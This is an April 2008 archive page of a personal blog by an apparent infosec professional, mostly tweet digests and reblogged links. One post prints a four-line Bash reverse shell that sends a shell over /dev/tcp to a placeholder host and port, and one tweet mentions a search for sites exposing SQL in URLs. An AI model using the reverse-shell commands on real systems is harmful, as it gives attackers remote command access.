April 2008
50 posts
07:47 Today, I hope to find a picture to take for a new website. # 11:54 I’d like something similar to what Danchev posts on his blog: synopses of attacks, hosts used, etc. to ID hosts to null-route at our border. # 17:14 Just closed on a refi. Painless and actually pleasurable. If you need a referral for an excellent broker in Mpls, please do ask. # 22:20 A three-fer! House status:...
Apr 30th
Stop XSS attacks with SafeHTML →
If you allow user-contributed content in your site, you run into the problem of dealing with user supplied HTML in a safe manner. The most secure way of dealing with things, of course, is to strip…
Apr 30th
Mazda creates disassembly line in wake of Cougar... →
Filed under: Plants/Manufacturing, Mazda If you’ve ever smashed up a car in an accident, you’ve probably had the unpleasant experience of dealing with insurance agents who assess what…
Apr 30th
Really good tips for writing and blogging
With exception to the “use lists” item, these tips are fantastic. I avoid blogs that incessantly post lists. If I wanted to be cheesy, I’d create a top-ten list of reasons to avoid lists. And this item I’m re-blogging is a list. But still, if you use lists, use them sparingly. Your average reader only has so much patience for random, non-cohesive ideas. If anything, use a...
Apr 29th
1 note
Apr 29th
09:40 Wishing I could start today with a ride on the motorcycle, but my hands are cold just trying to type! # 17:21 Note to JA-SIG web folk: Not everyone knows who you are. When going to ja-sig.org, you might mention that tidbit. # 22:09 Reading the (ISC)^2 Global Work Force Study. Interesting stuff, that. # 22:31 I *really* don’t think dopplr understands they need to make it easy to...
Apr 29th
15:43 Snowing again after a short ride on the moto. Now it’s nap time, then family over for steak kebabs on the grill. #
Apr 28th
07:18 My brother is going to apply for the ROTC program at the U of M! # 07:23 (And also Metro State.) It’ll get him home from South Korea, his schooling covered, a degree, and an eventual commission as an officer. Cool # 10:05 Today was the first time in a while I’ve noticed gas cheaper on Friday than Tuesday. $2.42 vs $2.55. # 12:46 I just found out I have to add 5 pages to my...
Apr 26th
Virtualization Security - Reading List →
Here’s a reading list of interesting posts in the virtualization+security space. There is a lot of thought going on about how virtualization in the data center affects application security. If you…
Apr 25th
09:35 I just uploaded a ton of pictures from my Hawaii/Japan trip in February. www.flickr.com/photos/minntc/ # 12:10 Lunch, then draft language to submit my project for a NASCIO award. www.nascio.org # 15:26 I will be going to Conf. Rm. G this afternoon to chat with my financial planner about [his] information security. I’m looking forward to it! # 15:53 Cube decoration:...
Apr 25th
09:07 NWA reports $191m loss. Delta reports $6.4b loss. Who should be buying who? # 15:40 I’m off to pick up my moto and ride into the sunset. Or maybe to North Minneapolis; I’m not sure yet. # 17:18 I’m off to the MIMA gathering. #
Apr 24th
16:10 In a preso on NAC. Presenter got Impulse SafeConnect for 1000 users for 2/3rds what Cisco wants for 250 users; installed & running in a day. # 16:18 $20k investment to blanket the campus, wired and wireless, in a day, with full vendor support. Cisco would be 2-3 times that. #
Apr 23rd
09:34 I’ve received about 10 “LAST FINAL NOTICE” messages from GoDaddy that something is expired. It would be nice if I could tell them I know. # 12:35 I think I’ll go ride bikes. #
Apr 22nd
AHHHH! →
AHHHH! canada r attacking! we must attack back!!1!! picture: dunno source, via our lolcat builder. lol caption: happehsockz
Apr 21st
08:32 OH: I gave that one up long ago when they kept changing names more than some truck drivers changed shirts. (On tracking MnSCU .edu domains.) # 13:00 Up to the ‘rents to sheetrock Mom’s art shack. Adios, Twitterland. #
Apr 20th
09:34 Compiling a list of the domains in our organization, then looking for a way to monitor for suspect content to notify site administrators. # 12:33 Confused about how Google ranks the results for a search of my name…only two are homepages and not near top, rest are social net profiles. # 15:13 My iPod is firing on all cylinders for a rainy-day playlist. Ani, Ibrahim Ferrer, an...
Apr 19th
“If you’re not prepared to be wrong, you’ll never come up with...”
–  Sir Ken Robinson
Apr 18th
00:37 Was fighting with Yahoo! Pipes to try and find a cleaner, leaner, meaner way to combine tweets into daily digests accessible via RSS. Sleep. # 14:47 Pulling Twitter feeds off my Tumblr page until I can figure out a better RSS tweet digest solution that actually captures all my tweets. # 15:50 Tres cool animation of This American Life tinyurl.com/39komh # 17:21 Time to retire to...
Apr 18th
Connect-back shell in four lines
From this blog post, you can create a connect-back shell with four BASH commands:
$ exec 0</dev/tcp/hostname/port # First we copy our connection over stdin
$ exec 1>&0 # Next we copy stdin to stdout
$ exec 2>&0 # And finally stdin to stderr
$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
Oh, and you can do that without root/wheel access.
Apr 17th
Apr 17th
7:36: @GraemeThickins I mean, if advertisers need consultants to sort out the ad networks, how is that arena accessible to a small business? 8:10: This is a great write-up on the Storm worm: http://tinyurl.com/678oyz 9:21: @flyspy The blackboxes are pretty cool. Toured one at St. Thomas last summer. Shippable, drive-up data center just needs water & power conns. 9:23: @sborsch You could open...
Apr 17th
09:10 This is a great write-up on the Storm worm: tinyurl.com/678oyz # 12:43 What fun! Go Google “allinurl: select from where in order” then shake your head in dismay that SQL queries are passed from the URL requested # 12:58 Retweet: You must have missed this. tinyurl.com/4ycfdj # 16:54 Off to Spill The Wine, then A Midsummer Night’s Dream at the Guthrie. #
Apr 17th
jth @rmsylte You just use the replicators for that. “Tea; Earl Grey; Hot.” (at 09:08 PM GMT from twitterrific) @swirlspice @jojeda You can also config gmail to “send as” your other accounts. (at 09:05 PM GMT from twitterrific) jojeda: From my tech blog: Video, print: Wii, Sarah,...
Apr 16th
22:29 Also, ate a 1,000 year-old egg. Duck egg cured in lye. Not bad! #
Apr 16th
06:47 Note to Twitter: Two-click interface to block, then dumping me back to main page = bad. One-click interface to block & don’t move me = good. # 08:21 Hi ho, hi ho, off to work I go. Campus assessment today, let’s see how these folks fare in the infosec arena. # 16:07 Time to ride the motorcycle! # 16:37 Very interesting article on privacy. From 1967. tinyurl.com/64zvs9...
Apr 15th
A Scary Web 2.0 Bedtime Story →
What would you do if your Google account disappeared five minutes ago? Or Yahoo! for those of you with aversion to GOOG. Or the 18 MSN-tied people left out there. Scary thoughts.
Apr 14th
jth Off to rack my beer into the secondary fermenter, then go clean the kitchen. Woo-hoo. (at 07:37 PM GMT from twitterrific) @garrickvanburen Possibly…that’s not far off from black-market current valuation for your identity information. At least name+SSN. (at 02:51 PM GMT from twitterrific) ...
Apr 14th
CO2 captured to feed biodiesel-producing algae →
Filed under: Biodiesel, Emerging Technologies, Carbon Capture Two companies, Holcim and Aurantia are starting a new project to reuse CO2. They take the CO2 produced by a cement…
Apr 14th
08:37 I’m definitely not sold on friendfeed. I signed up for another social network aggregator that did a better job of filling in gaps. # 08:40 …I just wish I could remember the damn URL for that site! # 09:43 New blag post where I explore why I bother with Twitter and blags. john.hoffoss.com/post/31636015 # 14:37 Off to rack my beer into the secondary fermenter, then go clean...
Apr 14th
Why do I Twitter?
I’ve got a few friends that, once aware of how many different social sites I’ve got accounts on, wonder how on Earth I have time to keep that up and why I bother. This goes for Flickr, Facebook, LinkedIn, Google [Talk|Reader|Mail|etc], Tumblr (thank you for reading!) and [especially] Twitter. I’ve never come up with a good response, so I thought I’d try to take a stab at...
Apr 13th
09:06 Don’t hurt the psychic clone babies! tinyurl.com/6xdabo # 09:33 DIY Steampunk Male Enhancement: vimeo.com/860821 #
Apr 13th
07:25 Google Analytics code to track link-clicks on files/external sites does not work with my personal site on Google Pages. Frustrating. # 07:46 Leaving now for the Social Media Brekkie. I hope the roads are alright. # 07:58 The roads in Minneapolis are wet, but not bad. Can I just say roseville is a PITA to get to. # 08:25 Fail 1: drove to Dunn bros before realizing brekkie is at...
Apr 12th
Sumday u will save lotsa ppl, meet sum robotz, an... →
Sumday u will save lotsa ppl, meet sum robotz, an den become a doosh. luke, eye iz ur fathur. picture: secret. lol caption: dmf15
Apr 10th
08:24 MPR Future Tense today: potential for hardware back doors/vulnerabilities baked into hardware by manufacturers. Interesting attack model. # 08:54 Michael Arrington: The guy you call if you need a quote from an extremist point of view from a reputable site. # 09:43 To-do list: long. Time in day: short. Must get busy! # 15:51 Looking for Twitterers in other industries and surprised how...
Apr 10th
Ethanol debate combusts →
Can alternative energy save lives? Stanford University prof Mark Jacobson says yes — except in one case: ethanol. His research, recently presented at the University of Minnesota, suggests…
Apr 10th
06:26 Off to the office. Hopefully remote printing worked. Then to Fergus Falls, then back home. Six hours on the road for a two hour meeting :( # 06:47 TPT is doing a show for MAKE Magazine! # 17:29 I need to brew more beer. I’ve given away or drunk over half of my first batch already! # 18:50 Precursor to Chuck Norris/Bruce Schneier Facts? You decide....
Apr 9th
10:34 Hey #sectwits, what has worked for your organization to train your IT staff and admins to be more aware of IT security and “best-practices”? # 10:46 For all you security twits, I’ve posted some brief thoughts on protocol security tweet [ john.hoffoss.com/post/31043219 ] #sectwits # 14:25 MN Senate banning “ticket-grabbing” (ticket sniping) software on the...
Apr 8th
#hashtags for Security Twits
Over the course of two months, Jennifer Leggio (mediaphyter) has amassed a list of around 80 Information Security twitterers here on her blog. This list will grow during and after RSA, I’m betting. While this group of folk is more interesting than your average industrial grouping of folk, there’s a lot of chatter that can make it tough for new followers to see the value in the...
Apr 7th
18:38 A great idea for those of you who are in a relationship and like eating: john.hoffoss.com/post/30978927 # 21:08 Watching “Once” with wifey. Very good so far. I am #notatrsa as well. # 22:15 Just finished watching “Once”. Buying Glen Hansard & Marketa Irglova’s “The Swell Season” tomorrow. #
Apr 7th
Asakusa!
I just upped a few shots from our day in Asakusa, Tokyo, Japan. I’ve got lots more to churn through, but this is a short set to test out my workflow. Problems already identified: screwed up tagging/descriptions that didn’t stick when I reordered my pictures. Sorry to those reading on RSS readers, that won’t happen again.
Apr 7th
The Anniversary Tradition
Wifey and I met [on a blind-date] on the third of the month. We married on the third, which also happened to be Labor Day. I only messed up in not proposing on the third. Ever since we celebrated our first month, (a cheesy event, as these are wont to be) we decided to try a new restaurant that neither of us had visited before. Every month since, on or around the third, we go-a-hunting for a new...
Apr 6th
10:14 Breakfast today: Three egg omelets, organic/naturally raised bacon, sprouted rye with blueberry marmalade. Also wow. # 10:15 On the docket for today: 3 mile walk, clean house (boo), 20-30 mile bike ride (yay), hearts & drinks with wife’s girlfriends (yay). # 18:01 Just buzzed my hair. #3 is the one for me. #
Apr 6th
13:17 Working on aggregating data from the past year of assessments at about 35 colleges & universities. Lots of possibilities but no inspiration. # 14:14 Got my Google Reader unread items count to 255…lowest it’s been in a long while. Cut about 20% of feeds I didn’t read. # 16:10 I am really looking forward to Sigma’s 30mm f/1.4 for Nikon cameras. # 17:58...
Apr 5th
12:10 Toying with the idea of providing some niche consulting on the side. # 13:11 I’ve just added comments to my Tumblr log via Disqus. It then pulls RSS from my LJ, which include Tweets posted daily via LoudTwitter. Ugh. # 16:43 Anyone considering attending the New Media Showcase tomorrow? (www.inms.umn.edu/digerati/) #
Apr 4th
Well, this will be interesting.
I’ve just revised the way my site here is set up. We’ll see how this goes. I just hacked in comments to my Tumblr account using Disqus! I’ve also stopped pulling my Twitter RSS feed directly to Tumblr. I’m now using LoudTwitter to post my Twits for each day to my LiveJournal. Tumblr (this site) will then pull the RSS feed of my LiveJournal blog, which will include those...
Apr 3rd
How do you increase the level of security in an org with 20,000 staff, 1,000 in IT (maybe), where least privilege is a foreign concept?
Apr 3rd
Create a high-level security program, awareness training, security assessments. What else?
Apr 3rd
There’s a big proposed update to FERPA (higher ed data privacy). Reviewing now to determine impact of those changes.
Apr 3rd
I am always perplexed when a discussion of security best practices is met with resistance from system and network administrators.
Apr 2nd